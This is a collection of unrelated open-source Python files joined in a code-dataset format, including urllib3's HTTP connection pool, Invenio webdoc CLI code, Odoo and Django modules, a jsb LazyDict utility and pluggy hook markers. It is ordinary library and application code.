sys.stderr.write(" -m, --mode=MODE \t\t Update cache mode(0=Never,1=if necessary,2=always) (default 2)\n")
sys.stderr.write("\n")
sys.stderr.write(" Example: webdoc search-guide\n")
sys.stderr.write(" Example: webdoc -l en,fr search-guide\n")
sys.stderr.write(" Example: webdoc -m 1 search-guide")
sys.stderr.write("\n")
sys.exit(exitcode)
def main():
"""
main entry point for webdoc via command line
"""
options = {'language':CFG_SITE_LANGS, 'verbose':1, 'mode':2}
try:
opts, args = getopt.getopt(sys.argv[1:],
"hVv:l:m:",
["help",
"version",
"verbose=",
"language=",
"mode="])
except getopt.GetoptError, err:
usage(1, err)
try:
for opt in opts:
if opt[0] in ["-h", "--help"]:
usage(0)
elif opt[0] in ["-V", "--version"]:
print __revision__
sys.exit(0)
elif opt[0] in ["-v", "--verbose"]:
options["verbose"] = int(opt[1])
elif opt[0] in ["-l", "--language"]:
options["language"] = [wash_language(lang.strip().lower()) \
for lang in opt[1].split(',') \
if lang in CFG_SITE_LANGS]
elif opt[0] in ["-m", "--mode"]:
options["mode"] = opt[1]
except StandardError, e:
usage(e)
try:
options["mode"] = int(options["mode"])
except ValueError:
usage(1, "Mode must be an integer")
if len(args) > 0:
options["webdoc"] = args[0]
if not options.has_key("webdoc"):
usage(0)
# check if webdoc exists
infos = get_webdoc_info(options["webdoc"])
if infos[0] is None:
usage(1, "Could not find %s" % options["webdoc"])
update_webdoc_cache(webdoc=options["webdoc"],
mode=options["mode"],
verbose=options["verbose"],
languages=options["language"])
if __name__ == "__main__":
main()
| valkyriesavage/invenio | modules/webstyle/lib/webdoc.py | Python | gpl-2.0 | 36,494 |
# Copyright 2018-20 ForgeFlow S.L. (https://www.forgeflow.com)
# License LGPL-3.0 or later (https://www.gnu.org/licenses/lgpl.html).
from odoo import models
class StockRule(models.Model):
_inherit = "stock.rule"
def _update_purchase_order_line(
self, product_id, product_qty, product_uom, company_id, values, line
):
vals = super()._update_purchase_order_line(
product_id, product_qty, product_uom, company_id, values, line
)
if "orderpoint_id" in values and values["orderpoint_id"].id:
vals["orderpoint_ids"] = [(4, values["orderpoint_id"].id)]
# If the procurement was run by a stock move.
elif "orderpoint_ids" in values:
vals["orderpoint_ids"] = [(4, o.id) for o in values["orderpoint_ids"]]
return vals
| OCA/stock-logistics-warehouse | stock_orderpoint_purchase_link/models/stock_rule.py | Python | agpl-3.0 | 816 |
import errno
import logging
import sys
import warnings
from socket import error as SocketError, timeout as SocketTimeout
import socket
try: # Python 3
from queue import LifoQueue, Empty, Full
except ImportError:
from Queue import LifoQueue, Empty, Full
import Queue as _ # Platform-specific: Windows
from .exceptions import (
ClosedPoolError,
ProtocolError,
EmptyPoolError,
HostChangedError,
LocationValueError,
MaxRetryError,
ProxyError,
ReadTimeoutError,
SSLError,
TimeoutError,
InsecureRequestWarning,
)
from .packages.ssl_match_hostname import CertificateError
from .packages import six
from .connection import (
port_by_scheme,
DummyConnection,
HTTPConnection, HTTPSConnection, VerifiedHTTPSConnection,
HTTPException, BaseSSLError, ConnectionError
)
from .request import RequestMethods
from .response import HTTPResponse
from .util.connection import is_connection_dropped
from .util.retry import Retry
from .util.timeout import Timeout
from .util.url import get_host
xrange = six.moves.xrange
log = logging.getLogger(__name__)
_Default = object()
## Pool objects
class ConnectionPool(object):
"""
Base class for all connection pools, such as
:class:`.HTTPConnectionPool` and :class:`.HTTPSConnectionPool`.
"""
scheme = None
QueueCls = LifoQueue
def __init__(self, host, port=None):
if not host:
raise LocationValueError("No host specified.")
# httplib doesn't like it when we include brackets in ipv6 addresses
self.host = host.strip('[]')
self.port = port
def __str__(self):
return '%s(host=%r, port=%r)' % (type(self).__name__,
self.host, self.port)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
# Return False to re-raise any potential exceptions
return False
def close():
"""
Close all pooled connections and disable the pool.
"""
pass
# This is taken from http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252
_blocking_errnos = set([errno.EAGAIN, errno.EWOULDBLOCK])
class HTTPConnectionPool(ConnectionPool, RequestMethods):
"""
Thread-safe connection pool for one host.
:param host:
Host used for this HTTP Connection (e.g. "localhost"), passed into
:class:`httplib.HTTPConnection`.
:param port:
Port used for this HTTP Connection (None is equivalent to 80), passed
into :class:`httplib.HTTPConnection`.
:param strict:
Causes BadStatusLine to be raised if the status line can't be parsed
as a valid HTTP/1.0 or 1.1 status line, passed into
:class:`httplib.HTTPConnection`.
.. note::
Only works in Python 2. This parameter is ignored in Python 3.
:param timeout:
Socket timeout in seconds for each individual connection. This can
be a float or integer, which sets the timeout for the HTTP request,
or an instance of :class:`urllib3.util.Timeout` which gives you more
fine-grained control over request timeouts. After the constructor has
been parsed, this is always a `urllib3.util.Timeout` object.
:param maxsize:
Number of connections to save that can be reused. More than 1 is useful
in multithreaded situations. If ``block`` is set to false, more
connections will be created but they will not be saved once they've
been used.
:param block:
If set to True, no more than ``maxsize`` connections will be used at
a time. When no free connections are available, the call will block
until a connection has been released. This is a useful side effect for
particular multithreaded situations where one does not want to use more
than maxsize connections per host to prevent flooding.
:param headers:
Headers to include with all requests, unless other headers are given
explicitly.
:param retries:
Retry configuration to use by default with requests in this pool.
:param _proxy:
Parsed proxy URL, should not be used directly, instead, see
:class:`urllib3.connectionpool.ProxyManager`"
:param _proxy_headers:
A dictionary with proxy headers, should not be used directly,
instead, see :class:`urllib3.connectionpool.ProxyManager`"
:param \**conn_kw:
Additional parameters are used to create fresh :class:`urllib3.connection.HTTPConnection`,
:class:`urllib3.connection.HTTPSConnection` instances.
"""
scheme = 'http'
ConnectionCls = HTTPConnection
def __init__(self, host, port=None, strict=False,
timeout=Timeout.DEFAULT_TIMEOUT, maxsize=1, block=False,
headers=None, retries=None,
_proxy=None, _proxy_headers=None,
**conn_kw):
ConnectionPool.__init__(self, host, port)
RequestMethods.__init__(self, headers)
self.strict = strict
if not isinstance(timeout, Timeout):
timeout = Timeout.from_float(timeout)
if retries is None:
retries = Retry.DEFAULT
self.timeout = timeout
self.retries = retries
self.pool = self.QueueCls(maxsize)
self.block = block
self.proxy = _proxy
self.proxy_headers = _proxy_headers or {}
# Fill the queue up so that doing get() on it will block properly
for _ in xrange(maxsize):
self.pool.put(None)
# These are mostly for testing and debugging purposes.
self.num_connections = 0
self.num_requests = 0
self.conn_kw = conn_kw
if self.proxy:
# Enable Nagle's algorithm for proxies, to avoid packet fragmentation.
# We cannot know if the user has added default socket options, so we cannot replace the
# list.
self.conn_kw.setdefault('socket_options', [])
def _new_conn(self):
"""
Return a fresh :class:`HTTPConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTP connection (%d): %s" %
(self.num_connections, self.host))
conn = self.ConnectionCls(host=self.host, port=self.port,
timeout=self.timeout.connect_timeout,
strict=self.strict, **self.conn_kw)
return conn
def _get_conn(self, timeout=None):
"""
Get a connection. Will return a pooled connection if one is available.
If no connections are available and :prop:`.block` is ``False``, then a
fresh connection is returned.
:param timeout:
Seconds to wait before giving up and raising
:class:`urllib3.exceptions.EmptyPoolError` if the pool is empty and
:prop:`.block` is ``True``.
"""
conn = None
try:
conn = self.pool.get(block=self.block, timeout=timeout)
except AttributeError: # self.pool is None
raise ClosedPoolError(self, "Pool is closed.")
except Empty:
if self.block:
raise EmptyPoolError(self,
"Pool reached maximum size and no more "
"connections are allowed.")
pass # Oh well, we'll create a new connection then
# If this is a persistent connection, check if it got disconnected
if conn and is_connection_dropped(conn):
log.info("Resetting dropped connection: %s" % self.host)
conn.close()
if getattr(conn, 'auto_open', 1) == 0:
# This is a proxied connection that has been mutated by
# httplib._tunnel() and cannot be reused (since it would
# attempt to bypass the proxy)
conn = None
return conn or self._new_conn()
def _put_conn(self, conn):
"""
Put a connection back into the pool.
:param conn:
Connection object for the current host and port as returned by
:meth:`._new_conn` or :meth:`._get_conn`.
If the pool is already full, the connection is closed and discarded
because we exceeded maxsize. If connections are discarded frequently,
then maxsize should be increased.
If the pool is closed, then the connection will be closed and discarded.
"""
try:
self.pool.put(conn, block=False)
return # Everything is dandy, done.
except AttributeError:
# self.pool is None.
pass
except Full:
# This should never happen if self.block == True
log.warning(
"Connection pool is full, discarding connection: %s" %
self.host)
# Connection never got put back into the pool, close it.
if conn:
conn.close()
def _validate_conn(self, conn):
"""
Called right before a request is made, after the socket is created.
"""
pass
def _prepare_proxy(self, conn):
# Nothing to do for HTTP connections.
pass
def _get_timeout(self, timeout):
""" Helper that always returns a :class:`urllib3.util.Timeout` """
if timeout is _Default:
return self.timeout.clone()
if isinstance(timeout, Timeout):
return timeout.clone()
else:
# User passed us an int/float. This is for backwards compatibility,
# can be removed later
return Timeout.from_float(timeout)
def _raise_timeout(self, err, url, timeout_value):
"""Is the error actually a timeout? Will raise a ReadTimeout or pass"""
if isinstance(err, SocketTimeout):
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
# See the above comment about EAGAIN in Python 3. In Python 2 we have
# to specifically catch it and throw the timeout error
if hasattr(err, 'errno') and err.errno in _blocking_errnos:
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
# Catch possible read timeouts thrown as SSL errors. If not the
# case, rethrow the original. We need to do this because of:
# http://bugs.python.org/issue10272
if 'timed out' in str(err) or 'did not complete (read)' in str(err): # Python 2.6
raise ReadTimeoutError(self, url, "Read timed out. (read timeout=%s)" % timeout_value)
def _make_request(self, conn, method, url, timeout=_Default,
**httplib_request_kw):
"""
Perform a request on a given urllib connection object taken from our
pool.
:param conn:
a connection from one of our connection pools
:param timeout:
Socket timeout in seconds for the request. This can be a
float or integer, which will set the same timeout value for
the socket connect and the socket read, or an instance of
:class:`urllib3.util.Timeout`, which gives you more fine-grained
control over your timeouts.
"""
self.num_requests += 1
timeout_obj = self._get_timeout(timeout)
timeout_obj.start_connect()
conn.timeout = timeout_obj.connect_timeout
# Trigger any extra validation we need to do.
try:
self._validate_conn(conn)
except (SocketTimeout, BaseSSLError) as e:
# Py2 raises this as a BaseSSLError, Py3 raises it as socket timeout.
self._raise_timeout(err=e, url=url, timeout_value=conn.timeout)
raise
# conn.request() calls httplib.*.request, not the method in
# urllib3.request. It also calls makefile (recv) on the socket.
conn.request(method, url, **httplib_request_kw)
# Reset the timeout for the recv() on the socket
read_timeout = timeout_obj.read_timeout
# App Engine doesn't have a sock attr
if getattr(conn, 'sock', None):
# In Python 3 socket.py will catch EAGAIN and return None when you
# try and read into the file pointer created by http.client, which
# instead raises a BadStatusLine exception. Instead of catching
# the exception and assuming all BadStatusLine exceptions are read
# timeouts, check for a zero timeout before making the request.
if read_timeout == 0:
raise ReadTimeoutError(
self, url, "Read timed out. (read timeout=%s)" % read_timeout)
if read_timeout is Timeout.DEFAULT_TIMEOUT:
conn.sock.settimeout(socket.getdefaulttimeout())
else: # None or a value
conn.sock.settimeout(read_timeout)
# Receive the response from the server
try:
try: # Python 2.7, use buffering of HTTP responses
httplib_response = conn.getresponse(buffering=True)
except TypeError: # Python 2.6 and older
httplib_response = conn.getresponse()
except (SocketTimeout, BaseSSLError, SocketError) as e:
self._raise_timeout(err=e, url=url, timeout_value=read_timeout)
raise
# AppEngine doesn't have a version attr.
http_version = getattr(conn, '_http_vsn_str', 'HTTP/?')
log.debug("\"%s %s %s\" %s %s" % (method, url, http_version,
httplib_response.status,
httplib_response.length))
return httplib_response
def close(self):
"""
Close all pooled connections and disable the pool.
"""
# Disable access to the pool
old_pool, self.pool = self.pool, None
try:
while True:
conn = old_pool.get(block=False)
if conn:
conn.close()
except Empty:
pass # Done.
def is_same_host(self, url):
"""
Check if the given ``url`` is a member of the same host as this
connection pool.
"""
if url.startswith('/'):
return True
# TODO: Add optional support for socket.gethostbyname checking.
scheme, host, port = get_host(url)
# Use explicit default port for comparison when none is given
if self.port and not port:
port = port_by_scheme.get(scheme)
elif not self.port and port == port_by_scheme.get(scheme):
port = None
return (scheme, host, port) == (self.scheme, self.host, self.port)
def urlopen(self, method, url, body=None, headers=None, retries=None,
redirect=True, assert_same_host=True, timeout=_Default,
pool_timeout=None, release_conn=None, **response_kw):
"""
Get a connection from the pool and perform an HTTP request. This is the
lowest level call for making a request, so you'll need to specify all
the raw details.
.. note::
More commonly, it's appropriate to use a convenience method provided
by :class:`.RequestMethods`, such as :meth:`request`.
.. note::
`release_conn` will only behave as expected if
`preload_content=False` because we want to make
`preload_content=False` the default behaviour someday soon without
breaking backwards compatibility.
:param method:
HTTP request method (such as GET, POST, PUT, etc.)
:param body:
Data to send in the request body (useful for creating
POST requests, see HTTPConnectionPool.post_url for
more convenience).
:param headers:
Dictionary of custom headers to send, such as User-Agent,
If-None-Match, etc. If None, pool headers are used. If provided,
these headers completely replace any pool-specific headers.
:param retries:
Configure the number of retries to allow before raising a
:class:`~urllib3.exceptions.MaxRetryError` exception.
Pass ``None`` to retry until you receive a response. Pass a
:class:`~urllib3.util.retry.Retry` object for fine-grained control
over different types of retries.
Pass an integer number to retry connection errors that many times,
but no other types of errors. Pass zero to never retry.
If ``False``, then retries are disabled and any exception is raised
immediately. Also, instead of raising a MaxRetryError on redirects,
the redirect response will be returned.
:type retries: :class:`~urllib3.util.retry.Retry`, False, or an int.
:param redirect:
If True, automatically handle redirects (status codes 301, 302,
303, 307, 308). Each redirect counts as a retry. Disabling retries
will disable redirect, too.
:param assert_same_host:
If ``True``, will make sure that the host of the pool requests is
consistent else will raise HostChangedError. When False, you can
use the pool on an HTTP proxy and request foreign hosts.
:param timeout:
If specified, overrides the default timeout for this one
request. It may be a float (in seconds) or an instance of
:class:`urllib3.util.Timeout`.
:param pool_timeout:
If set and the pool is set to block=True, then this method will
block for ``pool_timeout`` seconds and raise EmptyPoolError if no
connection is available within the time period.
:param release_conn:
If False, then the urlopen call will not release the connection
back into the pool once a response is received (but will release if
you read the entire contents of the response such as when
`preload_content=True`). This is useful if you're not preloading
the response's content immediately. You will need to call
``r.release_conn()`` on the response ``r`` to return the connection
back into the pool. If None, it takes the value of
``response_kw.get('preload_content', True)``.
:param \**response_kw:
Additional parameters are passed to
:meth:`urllib3.response.HTTPResponse.from_httplib`
"""
if headers is None:
headers = self.headers
if not isinstance(retries, Retry):
retries = Retry.from_int(retries, redirect=redirect, default=self.retries)
if release_conn is None:
release_conn = response_kw.get('preload_content', True)
# Check host
if assert_same_host and not self.is_same_host(url):
raise HostChangedError(self, url, retries)
conn = None
# Merge the proxy headers. Only do this in HTTP. We have to copy the
# headers dict so we can safely change it without those changes being
# reflected in anyone else's copy.
if self.scheme == 'http':
headers = headers.copy()
headers.update(self.proxy_headers)
# Must keep the exception bound to a separate variable or else Python 3
# complains about UnboundLocalError.
err = None
try:
# Request a connection from the queue.
timeout_obj = self._get_timeout(timeout)
conn = self._get_conn(timeout=pool_timeout)
conn.timeout = timeout_obj.connect_timeout
is_new_proxy_conn = self.proxy is not None and not getattr(conn, 'sock', None)
if is_new_proxy_conn:
self._prepare_proxy(conn)
# Make the request on the httplib connection object.
httplib_response = self._make_request(conn, method, url,
timeout=timeout_obj,
body=body, headers=headers)
# If we're going to release the connection in ``finally:``, then
# the request doesn't need to know about the connection. Otherwise
# it will also try to release it and we'll have a double-release
# mess.
response_conn = not release_conn and conn
# Import httplib's response into our own wrapper object
response = HTTPResponse.from_httplib(httplib_response,
pool=self,
connection=response_conn,
**response_kw)
# else:
# The connection will be put back into the pool when
# ``response.release_conn()`` is called (implicitly by
# ``response.read()``)
except Empty:
# Timed out by queue.
raise EmptyPoolError(self, "No pool connections are available.")
except (BaseSSLError, CertificateError) as e:
# Close the connection. If a connection is reused on which there
# was a Certificate error, the next request will certainly raise
# another Certificate error.
if conn:
conn.close()
conn = None
raise SSLError(e)
except SSLError:
# Treat SSLError separately from BaseSSLError to preserve
# traceback.
if conn:
conn.close()
conn = None
raise
except (TimeoutError, HTTPException, SocketError, ConnectionError) as e:
if conn:
# Discard the connection for these exceptions. It will be
# be replaced during the next _get_conn() call.
conn.close()
conn = None
if isinstance(e, SocketError) and self.proxy:
e = ProxyError('Cannot connect to proxy.', e)
elif isinstance(e, (SocketError, HTTPException)):
e = ProtocolError('Connection aborted.', e)
retries = retries.increment(method, url, error=e, _pool=self,
_stacktrace=sys.exc_info()[2])
retries.sleep()
# Keep track of the error for the retry warning.
err = e
finally:
if release_conn:
# Put the connection back to be reused. If the connection is
# expired then it will be None, which will get replaced with a
# fresh connection during _get_conn.
self._put_conn(conn)
if not conn:
# Try again
log.warning("Retrying (%r) after connection "
"broken by '%r': %s" % (retries, err, url))
return self.urlopen(method, url, body, headers, retries,
redirect, assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
# Handle redirect?
redirect_location = redirect and response.get_redirect_location()
if redirect_location:
if response.status == 303:
method = 'GET'
try:
retries = retries.increment(method, url, response=response, _pool=self)
except MaxRetryError:
if retries.raise_on_redirect:
raise
return response
log.info("Redirecting %s -> %s" % (url, redirect_location))
return self.urlopen(method, redirect_location, body, headers,
retries=retries, redirect=redirect,
assert_same_host=assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
# Check if we should retry the HTTP response.
if retries.is_forced_retry(method, status_code=response.status):
retries = retries.increment(method, url, response=response, _pool=self)
retries.sleep()
log.info("Forced retry: %s" % url)
return self.urlopen(method, url, body, headers,
retries=retries, redirect=redirect,
assert_same_host=assert_same_host,
timeout=timeout, pool_timeout=pool_timeout,
release_conn=release_conn, **response_kw)
return response
class HTTPSConnectionPool(HTTPConnectionPool):
"""
Same as :class:`.HTTPConnectionPool`, but HTTPS.
When Python is compiled with the :mod:`ssl` module, then
:class:`.VerifiedHTTPSConnection` is used, which *can* verify certificates,
instead of :class:`.HTTPSConnection`.
:class:`.VerifiedHTTPSConnection` uses one of ``assert_fingerprint``,
``assert_hostname`` and ``host`` in this order to verify connections.
If ``assert_hostname`` is False, no verification is done.
The ``key_file``, ``cert_file``, ``cert_reqs``, ``ca_certs`` and
``ssl_version`` are only used if :mod:`ssl` is available and are fed into
:meth:`urllib3.util.ssl_wrap_socket` to upgrade the connection socket
into an SSL socket.
"""
scheme = 'https'
ConnectionCls = HTTPSConnection
def __init__(self, host, port=None,
strict=False, timeout=Timeout.DEFAULT_TIMEOUT, maxsize=1,
block=False, headers=None, retries=None,
_proxy=None, _proxy_headers=None,
key_file=None, cert_file=None, cert_reqs=None,
ca_certs=None, ssl_version=None,
assert_hostname=None, assert_fingerprint=None,
**conn_kw):
HTTPConnectionPool.__init__(self, host, port, strict, timeout, maxsize,
block, headers, retries, _proxy, _proxy_headers,
**conn_kw)
self.key_file = key_file
self.cert_file = cert_file
self.cert_reqs = cert_reqs
self.ca_certs = ca_certs
self.ssl_version = ssl_version
self.assert_hostname = assert_hostname
self.assert_fingerprint = assert_fingerprint
def _prepare_conn(self, conn):
"""
Prepare the ``connection`` for :meth:`urllib3.util.ssl_wrap_socket`
and establish the tunnel if proxy is used.
"""
if isinstance(conn, VerifiedHTTPSConnection):
conn.set_cert(key_file=self.key_file,
cert_file=self.cert_file,
cert_reqs=self.cert_reqs,
ca_certs=self.ca_certs,
assert_hostname=self.assert_hostname,
assert_fingerprint=self.assert_fingerprint)
conn.ssl_version = self.ssl_version
return conn
def _prepare_proxy(self, conn):
"""
Establish tunnel connection early, because otherwise httplib
would improperly set Host: header to proxy's IP:port.
"""
# Python 2.7+
try:
set_tunnel = conn.set_tunnel
except AttributeError: # Platform-specific: Python 2.6
set_tunnel = conn._set_tunnel
if sys.version_info <= (2, 6, 4) and not self.proxy_headers: # Python 2.6.4 and older
set_tunnel(self.host, self.port)
else:
set_tunnel(self.host, self.port, self.proxy_headers)
conn.connect()
def _new_conn(self):
"""
Return a fresh :class:`httplib.HTTPSConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTPS connection (%d): %s"
% (self.num_connections, self.host))
if not self.ConnectionCls or self.ConnectionCls is DummyConnection:
raise SSLError("Can't connect to HTTPS URL because the SSL "
"module is not available.")
actual_host = self.host
actual_port = self.port
if self.proxy is not None:
actual_host = self.proxy.host
actual_port = self.proxy.port
conn = self.ConnectionCls(host=actual_host, port=actual_port,
timeout=self.timeout.connect_timeout,
strict=self.strict, **self.conn_kw)
return self._prepare_conn(conn)
def _validate_conn(self, conn):
"""
Called right before a request is made, after the socket is created.
"""
super(HTTPSConnectionPool, self)._validate_conn(conn)
# Force connect early to allow us to validate the connection.
if not getattr(conn, 'sock', None): # AppEngine might not have `.sock`
conn.connect()
if not conn.is_verified:
warnings.warn((
'Unverified HTTPS request is being made. '
'Adding certificate verification is strongly advised. See: '
'https://urllib3.readthedocs.org/en/latest/security.html'),
InsecureRequestWarning)
def connection_from_url(url, **kw):
"""
Given a url, return an :class:`.ConnectionPool` instance of its host.
This is a shortcut for not having to parse out the scheme, host, and port
of the url before creating an :class:`.ConnectionPool` instance.
:param url:
Absolute URL string that must include the scheme. Port is optional.
:param \**kw:
Passes additional parameters to the constructor of the appropriate
:class:`.ConnectionPool`. Useful for specifying things like
timeout, maxsize, headers, etc.
Example::
>>> conn = connection_from_url('http://google.com/')
>>> r = conn.request('GET', '/')
"""
scheme, host, port = get_host(url)
if scheme == 'https':
return HTTPSConnectionPool(host, port=port, **kw)
else:
return HTTPConnectionPool(host, port=port, **kw)
| bendikro/deluge-yarss-plugin | yarss2/lib/requests/packages/urllib3/connectionpool.py | Python | gpl-3.0 | 30,319 |
import pytest
class TestNcftp:
@pytest.mark.complete("ncftp ")
def test_1(self, completion):
assert completion
@pytest.mark.complete("ncftp -", require_cmd=True)
def test_2(self, completion):
assert completion
| algorythmic/bash-completion | test/t/test_ncftp.py | Python | gpl-2.0 | 245 |
import matplotlib.pylab as plt
plt.ion()
import cPickle as pickle
import numpy as np
from scipy.io import loadmat
from sklearn.cross_validation import train_test_split
from activation_funcs import sigmoid_function, tanh_function
from neural_net import NeuralNet
# load standardized data and labels to disk
train_features = np.load('train_features.np')
train_labels = np.load('train_labels.pkl')
# split to obtain train and test set
x_train, x_test, y_train, y_test = train_test_split(train_features,
train_labels,
test_size=0.33)
# network topology
n_inputs = train_features.shape[1]
n_outputs = 10
n_hiddens_nodes = 200
n_hidden_layers = 1
# specify activation functions per layer
activation_functions = [tanh_function] * n_hidden_layers + [sigmoid_function]
# initialize the neural network
network = NeuralNet(n_inputs, n_outputs, n_hiddens_nodes, n_hidden_layers,
activation_functions)
# start training on test set one
learning_rate = 0.001
plot_step = 5000
pred_epochs = np.arange(0, x_train.shape[0], plot_step)
errors = network.train(x_train, y_train, learning_rate, pred_epochs=pred_epochs)
plt.plot(errors)
plt.savefig('nn_errors.png')
# save the trained network
#network.save_pkl_to_file( "trained_configuration.pkl" )
# load a stored network configuration
# network = NeuralNet.load_pkl_from_file( "trained_configuration.pkl" )
| jvpoulos/cs289-hw6 | code/test_neural_network.py | Python | mit | 1,471 |
# jsb/utils/lazydict.py
#
# thnx to maze
""" a lazydict allows dotted access to a dict .. dict.key. """
## jsb imports
from jsb.utils.locking import lockdec
from jsb.utils.exception import handle_exception
from jsb.lib.errors import PropertyIgnored
from jsb.imports import getjson
json = getjson()
## basic imports
from xml.sax.saxutils import unescape
import copy
import logging
import uuid
import types
import threading
import os
import re
## locks
lock = threading.RLock()
locked = lockdec(lock)
## defines
jsontypes = [types.StringType, types.UnicodeType, types.DictType, types.ListType, types.IntType]
defaultignore = ['finished', 'inqueue', 'resqueue', 'outqueue', 'waitlist', 'comments', 'createdfrom', 'modname', 'cfile', 'dir', 'filename', 'webchannels', 'tokens', 'token', 'cmndperms', 'gatekeeper', 'stanza', 'isremote', 'iscmnd', 'orig', 'bot', 'origtxt', 'body', 'subelements', 'args', 'rest', 'cfg', 'pass', 'password', 'fsock', 'sock', 'handlers', 'users', 'plugins']
cpy = copy.deepcopy
## checkignore function
def checkignore(name, ignore):
""" see whether a element attribute (name) should be ignored. """
name = unicode(name)
if name.startswith('_'): return True
for item in ignore:
if item == name:
#logging.debug("lazydict - ignoring on %s" % name)
return True
return False
#@locked
def dumpelement(element, prev={}, withtypes=False):
""" check each attribute of element whether it is dumpable. """
elem = cpy(element)
if not elem: elem = element
try: new = dict(prev)
except (TypeError, ValueError): new = {}
for name in elem:
#logging.debug("lazydict - trying dump of %s" % name)
if checkignore(name, defaultignore): continue
if not elem[name]: continue
try:
json.dumps(elem[name])
new[name] = elem[name]
except TypeError:
if type(elem) not in jsontypes:
if withtypes: new[name] = unicode(type(elem))
else:
logging.warn("lazydict - dumpelement - %s" % elem[name])
new[name] = dumpelement(elem[name], new)
return new
## LazyDict class
class LazyDict(dict):
""" lazy dict allows dotted access to a dict """
def __deepcopy__(self, a):
return LazyDict(a)
def __getattr__(self, attr, default=None):
""" get attribute. """
if not self.has_key(attr): self[attr] = default
return self[attr]
def __setattr__(self, attr, value):
""" set attribute. """
self[attr] = value
def render(self, template):
temp = open(template, 'r').read()
for key, value in self.iteritems():
try: temp = temp.replace("{{ %s }}" % key, value)
except: pass
return temp
def dostring(self):
""" return a string representation of the dict """
res = ""
cp = dict(self)
for item, value in cp.iteritems(): res += "%r=%r " % (item, value)
return res
def tojson(self, withtypes=False):
""" dump the lazydict object to json. """
try: return json.dumps(dumpelement(self, withtypes))
except RuntimeError, ex: handle_exception()
def dump(self, withtypes=False):
""" just dunp the lazydict object. DON'T convert to json. """
#logging.warn("lazydict - dumping - %s" % type(self))
try: return dumpelement(cpy(self), withtypes)
except RuntimeError, ex: handle_exception()
def load(self, input):
""" load from json string. """
try: temp = json.loads(input)
except ValueError:
handle_exception()
logging.error("lazydict - can't decode %s" % input)
return self
if type(temp) != dict:
logging.error("lazydict - %s is not a dict" % str(temp))
return self
self.update(temp)
return self
def tofile(self, filename):
f = open(filename + ".tmp", 'w')
f.write(self.tojson())
f.close()
os.rename(filename + '.tmp', filename)
def fromfile(self, filename):
f = open(filename, "r")
self.update(json.loads(f.read()))
| melmothx/jsonbot | jsb/utils/lazydict.py | Python | mit | 4,224 |
from django import template
import json
import django.utils.html
import django.utils.safestring
register = template.Library()
@register.simple_tag(takes_context=True)
def json_messages(context):
for m in context.get('json_messages',[]):
m['msg'] = django.utils.html.escapejs(m['msg'])
json_dump = json.dumps(context.get('json_messages'))
return json_dump
@register.simple_tag(takes_context=True)
def json_messages_script(context, on_window=True, js_variable='messages'):
script = '<script type="text/javascript">{variable_definition} = {dump};</script>'
if on_window:
variable_definition = 'window.{}'
else:
variable_definition = 'var {}'
variable_definition = variable_definition.format(js_variable)
return script.format(variable_definition=variable_definition, dump=json_messages(context))
| matiboy/django-json-messages | json_messages/templatetags/json_messages.py | Python | gpl-2.0 | 811 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2016-11-23 18:18
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ctdata', '0038_auto_20161123_1227'),
]
operations = [
migrations.AddField(
model_name='dataacademyabstractevent',
name='eventbrite_event_id',
field=models.CharField(default='', max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='dataacademyabstractevent',
name='publish_eventbrite',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='dataacademyabstractevent',
name='time_from',
field=models.TimeField(null=True, verbose_name='Start time'),
),
migrations.AlterField(
model_name='dataacademyabstractevent',
name='time_to',
field=models.TimeField(null=True, verbose_name='End time'),
),
]
| CT-Data-Collaborative/ctdata-wagtail-cms | ctdata/migrations/0039_auto_20161123_1818.py | Python | mit | 1,100 |
"""
Internal hook annotation, representation and calling machinery.
"""
import inspect
import sys
import warnings
class HookspecMarker:
""" Decorator helper class for marking functions as hook specifications.
You can instantiate it with a project_name to get a decorator.
Calling :py:meth:`.PluginManager.add_hookspecs` later will discover all marked functions
if the :py:class:`.PluginManager` uses the same project_name.
"""
def __init__(self, project_name):
self.project_name = project_name
def __call__(
self, function=None, firstresult=False, historic=False, warn_on_impl=None
):
""" if passed a function, directly sets attributes on the function
which will make it discoverable to :py:meth:`.PluginManager.add_hookspecs`.
If passed no function, returns a decorator which can be applied to a function
later using the attributes supplied.
If ``firstresult`` is ``True`` the 1:N hook call (N being the number of registered
hook implementation functions) will stop at I<=N when the I'th function
returns a non-``None`` result.
If ``historic`` is ``True`` calls to a hook will be memorized and replayed
on later registered plugins.
"""
def setattr_hookspec_opts(func):
if historic and firstresult:
raise ValueError("cannot have a historic firstresult hook")
setattr(
func,
self.project_name + "_spec",
dict(
firstresult=firstresult,
historic=historic,
warn_on_impl=warn_on_impl,
),
)
return func
if function is not None:
return setattr_hookspec_opts(function)
else:
return setattr_hookspec_opts
class HookimplMarker:
""" Decorator helper class for marking functions as hook implementations.
You can instantiate with a ``project_name`` to get a decorator.
Calling :py:meth:`.PluginManager.register` later will discover all marked functions
if the :py:class:`.PluginManager` uses the same project_name.
"""
def __init__(self, project_name):
self.project_name = project_name
def __call__(
self,
function=None,
hookwrapper=False,
optionalhook=False,
tryfirst=False,
trylast=False,
specname=None,
):
""" if passed a function, directly sets attributes on the function
which will make it discoverable to :py:meth:`.PluginManager.register`.
If passed no function, returns a decorator which can be applied to a
function later using the attributes supplied.
If ``optionalhook`` is ``True`` a missing matching hook specification will not result
in an error (by default it is an error if no matching spec is found).
If ``tryfirst`` is ``True`` this hook implementation will run as early as possible
in the chain of N hook implementations for a specification.
If ``trylast`` is ``True`` this hook implementation will run as late as possible
in the chain of N hook implementations.
If ``hookwrapper`` is ``True`` the hook implementations needs to execute exactly
one ``yield``. The code before the ``yield`` is run early before any non-hookwrapper
function is run. The code after the ``yield`` is run after all non-hookwrapper
function have run. The ``yield`` receives a :py:class:`.callers._Result` object
representing the exception or result outcome of the inner calls (including other
hookwrapper calls).
If ``specname`` is provided, it will be used instead of the function name when
matching this hook implementation to a hook specification during registration.
